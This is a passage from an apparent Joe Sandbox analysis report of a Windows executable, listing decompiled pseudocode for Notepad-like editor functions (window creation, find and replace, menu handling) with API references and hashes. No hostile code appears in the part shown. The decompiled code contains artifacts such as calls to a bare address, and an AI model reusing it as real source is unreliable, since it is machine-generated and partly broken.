                                                                                    						__eflags =  *0x415fdc; // 0x0
                                                                                    						if(__eflags == 0) {
                                                                                    							_t94 = 0x50b001c4;
                                                                                    						}
                                                                                    						 *0x415f6c = CreateWindowExW(0x200, L"edit", 0, _t94, 0, 0, _v20.right, _v20.bottom, _a4, 0,  *0x415f60, 0);
                                                                                    						_t54 = CreateFontIndirectW(0x415f80);
                                                                                    						 *0x415f70 = _t54;
                                                                                    						SendMessageW( *0x415f6c, 0x30, _t54, 0);
                                                                                    						SendMessageW( *0x415f6c, 0xc5, 0, 0);
                                                                                    						 *0x415f74 = CreateWindowExW(0, 0x6e, 0, 0x50000000, 0, 0, 0, 0, _a4, 0,  *0x415f60, 0);
                                                                                    						LoadStringW( *0x415f60, 0x206, 0x415f7c, 0);
                                                                                    						 *0x4170f4 =  *0x4170f4 | 0xffffffff;
                                                                                    						 *0x4170f8 =  *0x4170f8 | 0xffffffff;
                                                                                    						E004010B6();
                                                                                    						goto L34;
                                                                                    					}
                                                                                    					_t60 = _t50 - 1;
                                                                                    					__eflags = _t60;
                                                                                    					if(_t60 == 0) {
                                                                                    						E004011CB(__edx);
                                                                                    						PostQuitMessage(0);
                                                                                    						goto L34;
                                                                                    					}
                                                                                    					_t62 = _t60 - 3;
                                                                                    					__eflags = _t62;
                                                                                    					if(_t62 == 0) {
                                                                                    						E00401170(_a16 & 0x0000ffff, _a16 >> 0x10);
                                                                                    						goto L34;
                                                                                    					}
                                                                                    					_t68 = _t62;
                                                                                    					__eflags = _t68;
                                                                                    					if(_t68 == 0) {
                                                                                    						SetFocus( *0x415f6c);
                                                                                    						goto L34;
                                                                                    					}
                                                                                    					_t70 = _t68 - 9;
                                                                                    					__eflags = _t70;
                                                                                    					if(_t70 != 0) {
                                                                                    						goto L30;
                                                                                    					}
                                                                                    					0x400000();
                                                                                    					__eflags = _t70;
                                                                                    					if(_t70 != 0) {
                                                                                    						DestroyWindow(_a4);
                                                                                    					}
                                                                                    					goto L34;
                                                                                    				}
                                                                                    				_t82 = _a16;
                                                                                    				if(( *(_t82 + 0xc) & 0x00000040) != 0) {
                                                                                    					 *0x415f68 =  *0x415f68 & 0x00000000;
                                                                                    				}
                                                                                    				if(( *(_t82 + 0xc) & 0x00000008) != 0) {
                                                                                    					_t89 = 0xa;
                                                                                    					memcpy(0x417124, _t82, _t89 << 2);
                                                                                    					_t113 = _t113 + 0xc;
                                                                                    					E00401C3A(_t82);
                                                                                    				}
                                                                                    				if(( *(_t82 + 0xc) & 0x00000010) != 0) {
                                                                                    					_t87 = 0xa;
                                                                                    					memcpy(0x417124, _t82, _t87 << 2);
                                                                                    					_t113 = _t113 + 0xc;
                                                                                    					E00401D4C(_t82);
                                                                                    				}
                                                                                    				if(( *(_t82 + 0xc) & 0x00000020) != 0) {
                                                                                    					_t85 = 0xa;
                                                                                    					memcpy(0x417124, _t82, _t85 << 2);
                                                                                    					E00401E09(_t82);
                                                                                    				}
                                                                                    				goto L34;
                                                                                    			}


























                                                                                    0x0040232d
                                                                                    0x00402334
                                                                                    0x00402337
                                                                                    0x00402342
                                                                                    0x004023a6
                                                                                    0x004023a9
                                                                                    0x004024fc
                                                                                    0x004024fc
                                                                                    0x00402501
                                                                                    0x00402563
                                                                                    0x00402568
                                                                                    0x00402568
                                                                                    0x0040256a
                                                                                    0x0040256e
                                                                                    0x0040256e
                                                                                    0x00402503
                                                                                    0x00402503
                                                                                    0x00402506
                                                                                    0x00402558
                                                                                    0x00000000
                                                                                    0x00402558
                                                                                    0x00402508
                                                                                    0x00402508
                                                                                    0x0040250d
                                                                                    0x00402536
                                                                                    0x0040253f
                                                                                    0x0040254e
                                                                                    0x00000000
                                                                                    0x0040254e
                                                                                    0x0040250f
                                                                                    0x00402514
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402516
                                                                                    0x00402520
                                                                                    0x00000000
                                                                                    0x00402520
                                                                                    0x004023af
                                                                                    0x004024ec
                                                                                    0x004024f1
                                                                                    0x004024f3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004024f7
                                                                                    0x00000000
                                                                                    0x004024f7
                                                                                    0x004023b7
                                                                                    0x004023b7
                                                                                    0x004023b8
                                                                                    0x0040242a
                                                                                    0x0040242f
                                                                                    0x00402437
                                                                                    0x0040243d
                                                                                    0x0040243f
                                                                                    0x0040243f
                                                                                    0x00402470
                                                                                    0x00402475
                                                                                    0x0040248b
                                                                                    0x00402490
                                                                                    0x0040249f
                                                                                    0x004024cc
                                                                                    0x004024d1
                                                                                    0x004024d7
                                                                                    0x004024de
                                                                                    0x004024e5
                                                                                    0x00000000
                                                                                    0x004024e5
                                                                                    0x004023ba
                                                                                    0x004023ba
                                                                                    0x004023bb
                                                                                    0x00402411
                                                                                    0x00402418
                                                                                    0x00000000
                                                                                    0x00402418
                                                                                    0x004023bd
                                                                                    0x004023bd
                                                                                    0x004023c0
                                                                                    0x00402407
                                                                                    0x00000000
                                                                                    0x00402407
                                                                                    0x004023c3
                                                                                    0x004023c3
                                                                                    0x004023c4
                                                                                    0x004023f0
                                                                                    0x00000000
                                                                                    0x004023f0
                                                                                    0x004023c6
                                                                                    0x004023c6
                                                                                    0x004023c9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004023cf
                                                                                    0x004023d4
                                                                                    0x004023d6
                                                                                    0x004023df
                                                                                    0x004023df
                                                                                    0x00000000
                                                                                    0x004023d6
                                                                                    0x00402344
                                                                                    0x0040234b
                                                                                    0x0040234d
                                                                                    0x0040234d
                                                                                    0x00402358
                                                                                    0x0040235c
                                                                                    0x00402365
                                                                                    0x00402365
                                                                                    0x00402367
                                                                                    0x00402367
                                                                                    0x00402370
                                                                                    0x00402374
                                                                                    0x0040237c
                                                                                    0x0040237c
                                                                                    0x00402380
                                                                                    0x00402380
                                                                                    0x00402389
                                                                                    0x00402391
                                                                                    0x0040239a
                                                                                    0x0040239c
                                                                                    0x0040239c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: DestroyFocusWindow
                                                                                    • String ID: $qA$$qA$$qA$edit
                                                                                    • API String ID: 3487535441-3532291762
                                                                                    • Opcode ID: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
                                                                                    • Instruction ID: 16f5dcc297cbe28d248b0e56e8d7a63b236712e1f54e60767082c5174542b945
                                                                                    • Opcode Fuzzy Hash: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
                                                                                    • Instruction Fuzzy Hash: 0B51C131140218BBDB219F75DE4CBEB3E68EB45394F148136FA04A61E1C7BD8941DB6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 80%
                                                                                    			E00401ABC() {
                                                                                    				signed int _t20;
                                                                                    				signed int _t25;
                                                                                    				signed int _t30;
                                                                                    				WCHAR* _t34;
                                                                                    				WCHAR* _t35;
                                                                                    				WCHAR* _t38;
                                                                                    
                                                                                    				LoadStringW( *0x415f60, 0x176, 0x416804, 0xff);
                                                                                    				_t34 = 0x416806 + lstrlenW(0x416804) * 2;
                                                                                    				lstrcpyW(_t34, L"*.txt");
                                                                                    				_t35 = _t34 + 2 + lstrlenW(_t34) * 2;
                                                                                    				LoadStringW( *0x415f60, 0x175, _t35, 0xff);
                                                                                    				_t38 = _t35 + 2 + lstrlenW(_t35) * 2;
                                                                                    				lstrcpyW(_t38, L"*.*");
                                                                                    				 *((short*)(_t38 + 2 + lstrlenW(_t38) * 2)) = 0;
                                                                                    				_t20 =  *0x415fdc; // 0x0
                                                                                    				 *0x41714c =  *0x41714c & 0;
                                                                                    				 *0x417150 =  *0x417150 & 0;
                                                                                    				asm("sbb eax, eax");
                                                                                    				CheckMenuItem(GetMenu( *0x415f64), 0x119,  ~_t20 & 0x00000008);
                                                                                    				_t25 =  *0x415f78; // 0x0
                                                                                    				asm("sbb eax, eax");
                                                                                    				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t25 & 0x00000008);
                                                                                    				_t30 =  *0x415f78; // 0x0
                                                                                    				asm("sbb eax, eax");
                                                                                    				return ShowWindow( *0x415f74,  ~_t30 & 0x00000005);
                                                                                    			}









                                                                                    0x00401adb
                                                                                    0x00401ae6
                                                                                    0x00401af3
                                                                                    0x00401b01
                                                                                    0x00401b11
                                                                                    0x00401b16
                                                                                    0x00401b20
                                                                                    0x00401b31
                                                                                    0x00401b36
                                                                                    0x00401b3b
                                                                                    0x00401b41
                                                                                    0x00401b49
                                                                                    0x00401b63
                                                                                    0x00401b65
                                                                                    0x00401b6c
                                                                                    0x00401b80
                                                                                    0x00401b82
                                                                                    0x00401b89
                                                                                    0x00401b9e

                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000176,00416804,000000FF,00000000), ref: 00401ADB
                                                                                    • lstrlenW.KERNEL32(00416804), ref: 00401AE4
                                                                                    • lstrcpyW.KERNEL32 ref: 00401AF3
                                                                                    • lstrlenW.KERNEL32(80000000), ref: 00401AFA
                                                                                    • LoadStringW.USER32(00000175,?,000000FF), ref: 00401B11
                                                                                    • lstrlenW.KERNEL32(?), ref: 00401B14
                                                                                    • lstrcpyW.KERNEL32 ref: 00401B20
                                                                                    • lstrlenW.KERNEL32(?), ref: 00401B27
                                                                                    • GetMenu.USER32(00000119), ref: 00401B5A
                                                                                    • CheckMenuItem.USER32(00000000), ref: 00401B63
                                                                                    • GetMenu.USER32(00000205), ref: 00401B7D
                                                                                    • CheckMenuItem.USER32(00000000), ref: 00401B80
                                                                                    • ShowWindow.USER32(00000000), ref: 00401B95
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                                                                                    • String ID: *.*$*.txt
                                                                                    • API String ID: 3918228958-3257935098
                                                                                    • Opcode ID: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
                                                                                    • Instruction ID: 572a540fb6504921a5b5a71d4603651758fe767a8bf175bd1912394847e7168a
                                                                                    • Opcode Fuzzy Hash: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
                                                                                    • Instruction Fuzzy Hash: 56118132590629BBD7016B78EC4ADEA3B7DEB88711B05C432F101E71B0D7B95881CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00401E09(intOrPtr _a4) {
                                                                                    				void* _v8;
                                                                                    				signed int _v12;
                                                                                    				int _v16;
                                                                                    				void* _t27;
                                                                                    				void* _t33;
                                                                                    				int _t38;
                                                                                    				void* _t44;
                                                                                    				int _t50;
                                                                                    				intOrPtr _t51;
                                                                                    
                                                                                    				_v16 = lstrlenW( *(_a4 + 0x10));
                                                                                    				SendMessageW( *0x415f6c, 0xb1, 0, 0);
                                                                                    				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                    				_t50 = _t4;
                                                                                    				_push(_t50 + _t50);
                                                                                    				_push(0);
                                                                                    				while(1) {
                                                                                    					_t27 = HeapAlloc(GetProcessHeap(), ??, ??);
                                                                                    					_v12 = _t27;
                                                                                    					if(_t27 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					GetWindowTextW( *0x415f6c, _v12, _t50);
                                                                                    					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
                                                                                    					_t51 = _a4;
                                                                                    					_t33 = ( *(_t51 + 0xc) & 0x00000005) - 1;
                                                                                    					if(_t33 == 0) {
                                                                                    						L3:
                                                                                    						if(_v8 ==  ~_v12) {
                                                                                    							_v8 = _v8 | 0xffffffff;
                                                                                    						}
                                                                                    						HeapFree(GetProcessHeap(), 0, _v12);
                                                                                    						_t38 = _v8;
                                                                                    						if(_t38 == 0xffffffff) {
                                                                                    							return SendMessageW( *0x415f6c, 0xb1, 0, 0);
                                                                                    						}
                                                                                    						SendMessageW( *0x415f6c, 0xb1, _t38, _v16 + _t38);
                                                                                    						SendMessageW( *0x415f6c, 0xc2, 1,  *(_t51 + 0x14));
                                                                                    						_t18 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                    						_t50 = _t18;
                                                                                    						_push(_t50 + _t50);
                                                                                    						_push(0);
                                                                                    						continue;
                                                                                    					}
                                                                                    					_t44 = _t33 - 4;
                                                                                    					if(_t44 == 0) {
                                                                                    						goto L3;
                                                                                    					}
                                                                                    					return _t44;
                                                                                    				}
                                                                                    				return _t27;
                                                                                    			}












                                                                                    0x00401e33
                                                                                    0x00401e36
                                                                                    0x00401e44
                                                                                    0x00401e44
                                                                                    0x00401e4a
                                                                                    0x00401e4b
                                                                                    0x00401eee
                                                                                    0x00401ef1
                                                                                    0x00401ef7
                                                                                    0x00401efc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401e61
                                                                                    0x00401e78
                                                                                    0x00401e7a
                                                                                    0x00401e83
                                                                                    0x00401e84
                                                                                    0x00401e8f
                                                                                    0x00401e97
                                                                                    0x00401e99
                                                                                    0x00401e99
                                                                                    0x00401ea5
                                                                                    0x00401eab
                                                                                    0x00401eb1
                                                                                    0x00000000
                                                                                    0x00401f13
                                                                                    0x00401ec5
                                                                                    0x00401ed7
                                                                                    0x00401ee5
                                                                                    0x00401ee5
                                                                                    0x00401eeb
                                                                                    0x00401eec
                                                                                    0x00000000
                                                                                    0x00401eec
                                                                                    0x00401e86
                                                                                    0x00401e89
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401f19
                                                                                    0x00401f19
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?), ref: 00401E18
                                                                                    • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401E36
                                                                                    • GetWindowTextLengthW.USER32 ref: 00401E3E
                                                                                    • GetWindowTextW.USER32 ref: 00401E61
                                                                                    • SendMessageW.USER32(000000B0,00000000,?), ref: 00401E78
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00401EA2
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00401EA5
                                                                                    • SendMessageW.USER32(000000B1,?,?), ref: 00401EC5
                                                                                    • SendMessageW.USER32(000000C2,00000001,?), ref: 00401ED7
                                                                                    • GetWindowTextLengthW.USER32 ref: 00401EDF
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401EEE
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401EF1
                                                                                    • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401F13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Heap$TextWindow$LengthProcess$AllocFreelstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1498816615-0
                                                                                    • Opcode ID: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
                                                                                    • Instruction ID: ce49090e5d19a19af0320e951ed4d397d30ac25977f929a6b7e329fcc34971d6
                                                                                    • Opcode Fuzzy Hash: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
                                                                                    • Instruction Fuzzy Hash: 57313A31A00609FFDB119BA0EC89FEE7B79EB88314F108031F941A61B0C7B5AD559B28
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 89%
                                                                                    			E00401C3A(WCHAR* _a4) {
                                                                                    				void* _v8;
                                                                                    				int _v12;
                                                                                    				WCHAR* _v16;
                                                                                    				void* _t28;
                                                                                    				signed int _t34;
                                                                                    				WCHAR* _t42;
                                                                                    				void* _t43;
                                                                                    				void* _t44;
                                                                                    				WCHAR* _t45;
                                                                                    				void* _t48;
                                                                                    				WCHAR* _t49;
                                                                                    				signed int _t53;
                                                                                    				int _t55;
                                                                                    				WCHAR* _t56;
                                                                                    
                                                                                    				_v12 = lstrlenW(_a4[8]);
                                                                                    				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                    				_t55 = _t4;
                                                                                    				_t28 = HeapAlloc(GetProcessHeap(), 0, _t55 + _t55);
                                                                                    				_t48 = _t28;
                                                                                    				if(_t48 != 0) {
                                                                                    					GetWindowTextW( *0x415f6c, _t48, _t55);
                                                                                    					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
                                                                                    					_t49 = _a4;
                                                                                    					_t34 =  *(_t49 + 0xc) & 0x00000005;
                                                                                    					if(_t34 == 0) {
                                                                                    						L5:
                                                                                    						_t56 = _a4;
                                                                                    						L6:
                                                                                    						_v8 = _t56 - _t48 >> 1;
                                                                                    						HeapFree(GetProcessHeap(), 0, _t48);
                                                                                    						if(_t56 != 0) {
                                                                                    							return SendMessageW( *0x415f6c, 0xb1, _v8, _v12 + _v8);
                                                                                    						}
                                                                                    						_t42 = _a4;
                                                                                    						0x400000( *0x415f68, 0x17b, _t42[8], 0x40);
                                                                                    						return _t42;
                                                                                    					}
                                                                                    					_t43 = _t34 - 1;
                                                                                    					if(_t43 == 0) {
                                                                                    						goto L5;
                                                                                    					}
                                                                                    					_t44 = _t43 - 3;
                                                                                    					if(_t44 == 0) {
                                                                                    						_t45 =  *(_t49 + 0x10);
                                                                                    						_t53 = _v8 - _v12;
                                                                                    						_v16 = _t45;
                                                                                    						_t18 = _t53 * 2; // -2
                                                                                    						_t56 = _t48 + _t18 - 2;
                                                                                    						lstrlenW(_t45);
                                                                                    						while(_t56 >= _t48) {
                                                                                    							if(lstrcmpW(_t56, _v16) == 0) {
                                                                                    								goto L6;
                                                                                    							}
                                                                                    							_t56 = _t56 - 2;
                                                                                    						}
                                                                                    						_t56 = 0;
                                                                                    						goto L6;
                                                                                    					}
                                                                                    					_t28 = _t44 - 1;
                                                                                    					if(_t28 == 0) {
                                                                                    						goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t28;
                                                                                    			}

















                                                                                    0x00401c57
                                                                                    0x00401c60
                                                                                    0x00401c60
                                                                                    0x00401c70
                                                                                    0x00401c76
                                                                                    0x00401c7a
                                                                                    0x00401c88
                                                                                    0x00401c9f
                                                                                    0x00401ca5
                                                                                    0x00401cae
                                                                                    0x00401cb1
                                                                                    0x00401cc2
                                                                                    0x00401cc2
                                                                                    0x00401cc5
                                                                                    0x00401cce
                                                                                    0x00401cd8
                                                                                    0x00401ce0
                                                                                    0x00000000
                                                                                    0x00401d3f
                                                                                    0x00401ce2
                                                                                    0x00401cf5
                                                                                    0x00000000
                                                                                    0x00401cf5
                                                                                    0x00401cb3
                                                                                    0x00401cb4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401cb6
                                                                                    0x00401cb9
                                                                                    0x00401cfc
                                                                                    0x00401d02
                                                                                    0x00401d06
                                                                                    0x00401d09
                                                                                    0x00401d09
                                                                                    0x00401d0d
                                                                                    0x00401d22
                                                                                    0x00401d1d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401d1f
                                                                                    0x00401d1f
                                                                                    0x00401d26
                                                                                    0x00000000
                                                                                    0x00401d26
                                                                                    0x00401cbb
                                                                                    0x00401cbc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401cbc
                                                                                    0x00401d49

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?), ref: 00401C4F
                                                                                    • GetWindowTextLengthW.USER32 ref: 00401C5A
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401C69
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401C70
                                                                                    • GetWindowTextW.USER32 ref: 00401C88
                                                                                    • SendMessageW.USER32(000000B0,00000000,?), ref: 00401C9F
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401CD1
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00401CD8
                                                                                    • lstrlenW.KERNEL32(?), ref: 00401D0D
                                                                                    • lstrcmpW.KERNEL32(-00000002,?), ref: 00401D15
                                                                                    • SendMessageW.USER32(000000B1,?,?), ref: 00401D3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$MessageProcessSendTextWindowlstrlen$AllocFreeLengthlstrcmp
                                                                                    • String ID:
                                                                                    • API String ID: 302198436-0
                                                                                    • Opcode ID: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
                                                                                    • Instruction ID: 738a3a3d88226cada9937fa8338a0d395f6bf2963d328e57f9c5620f5e592caa
                                                                                    • Opcode Fuzzy Hash: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
                                                                                    • Instruction Fuzzy Hash: 95312D76A40208EFDB119FA4EC48FDE7B68EB48304F158075FA05AB2A0DB75AD41DB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00401D4C(WCHAR* __edi) {
                                                                                    				void* _v8;
                                                                                    				void* _v12;
                                                                                    				int _v16;
                                                                                    				void* _t19;
                                                                                    				void* _t26;
                                                                                    				signed int _t27;
                                                                                    				void* _t34;
                                                                                    				WCHAR* _t37;
                                                                                    				int _t38;
                                                                                    
                                                                                    				_t37 = __edi;
                                                                                    				_v16 = lstrlenW( *(__edi + 0x10));
                                                                                    				_t3 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                                                                                    				_t38 = _t3;
                                                                                    				_t19 = HeapAlloc(GetProcessHeap(), 0, _t38 + _t38);
                                                                                    				_t34 = _t19;
                                                                                    				if(_t34 != 0) {
                                                                                    					GetWindowTextW( *0x415f6c, _t34, _t38);
                                                                                    					SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
                                                                                    					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
                                                                                    					if(_t26 == 0) {
                                                                                    						L3:
                                                                                    						_t27 = _v12;
                                                                                    						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t37 + 0x10), _t34 + _t27 * 2) == 0) {
                                                                                    							SendMessageW( *0x415f6c, 0xc2, 1,  *(_t37 + 0x14));
                                                                                    						}
                                                                                    						HeapFree(GetProcessHeap(), 0, _t34);
                                                                                    						return E00401C3A(_t37);
                                                                                    					}
                                                                                    					_t19 = _t26 - 4;
                                                                                    					if(_t19 == 0) {
                                                                                    						goto L3;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t19;
                                                                                    			}












                                                                                    0x00401d4c
                                                                                    0x00401d63
                                                                                    0x00401d6c
                                                                                    0x00401d6c
                                                                                    0x00401d7c
                                                                                    0x00401d82
                                                                                    0x00401d86
                                                                                    0x00401d90
                                                                                    0x00401daf
                                                                                    0x00401db7
                                                                                    0x00401db8
                                                                                    0x00401dbf
                                                                                    0x00401dbf
                                                                                    0x00401dca
                                                                                    0x00401ded
                                                                                    0x00401ded
                                                                                    0x00401df9
                                                                                    0x00000000
                                                                                    0x00401e00
                                                                                    0x00401dba
                                                                                    0x00401dbd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401dbd
                                                                                    0x00401e08

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?), ref: 00401D57
                                                                                    • GetWindowTextLengthW.USER32 ref: 00401D66
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D75
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401D7C
                                                                                    • GetWindowTextW.USER32 ref: 00401D90
                                                                                    • SendMessageW.USER32(000000B0,?,?), ref: 00401DAF
                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 00401DD3
                                                                                    • SendMessageW.USER32(000000C2,00000001,?), ref: 00401DED
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401DF2
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00401DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$MessageProcessSendTextWindow$AllocFreeLengthlstrcmplstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 276103653-0
                                                                                    • Opcode ID: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
                                                                                    • Instruction ID: 8ca4d24a7fc5045a5f5655c77c8d62678ef15db99f04df4acbda4ba5258b7913
                                                                                    • Opcode Fuzzy Hash: 73957ffef09ac0703d59bfb5c25fef60643b5419a745646a960d329f4784b7a4
                                                                                    • Instruction Fuzzy Hash: 3211FE31A00609FFDB11AFA4EC88EDE7F79FF08345F008076F545A2160DB75A9948B68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 71%
                                                                                    			E00401B9F(struct HMENU__* __ebx) {
                                                                                    				signed int _t3;
                                                                                    				signed int _t7;
                                                                                    				signed int _t15;
                                                                                    				int _t25;
                                                                                    
                                                                                    				_t3 = SendMessageW( *0x415f6c, 0xc6, 0, 0);
                                                                                    				asm("sbb eax, eax");
                                                                                    				EnableMenuItem(__ebx, 0x110,  ~_t3 + 1);
                                                                                    				_t7 = IsClipboardFormatAvailable(1);
                                                                                    				asm("sbb eax, eax");
                                                                                    				EnableMenuItem(__ebx, 0x113,  ~_t7 + 1);
                                                                                    				_t25 = 0 | SendMessageW( *0x415f6c, 0xb0, 0, 0) >> 0x00000010 == _t11;
                                                                                    				EnableMenuItem(__ebx, 0x111, _t25);
                                                                                    				EnableMenuItem(__ebx, 0x112, _t25);
                                                                                    				EnableMenuItem(__ebx, 0x114, _t25);
                                                                                    				_t15 = GetWindowTextLengthW( *0x415f6c);
                                                                                    				asm("sbb eax, eax");
                                                                                    				return EnableMenuItem(__ebx, 0x116,  ~_t15 + 1);
                                                                                    			}







                                                                                    0x00401bb6
                                                                                    0x00401bc0
                                                                                    0x00401bca
                                                                                    0x00401bce
                                                                                    0x00401bd6
                                                                                    0x00401be0
                                                                                    0x00401c00
                                                                                    0x00401c09
                                                                                    0x00401c12
                                                                                    0x00401c1b
                                                                                    0x00401c23
                                                                                    0x00401c2b
                                                                                    0x00401c39

                                                                                    APIs
                                                                                    • SendMessageW.USER32(000000C6,00000000,00000000), ref: 00401BB6
                                                                                    • EnableMenuItem.USER32 ref: 00401BCA
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00401BCE
                                                                                    • EnableMenuItem.USER32 ref: 00401BE0
                                                                                    • SendMessageW.USER32(000000B0,00000000,00000000), ref: 00401BF1
                                                                                    • EnableMenuItem.USER32 ref: 00401C09
                                                                                    • EnableMenuItem.USER32 ref: 00401C12
                                                                                    • EnableMenuItem.USER32 ref: 00401C1B
                                                                                    • GetWindowTextLengthW.USER32 ref: 00401C23
                                                                                    • EnableMenuItem.USER32 ref: 00401C35
                                                                                    Memory Dump Source
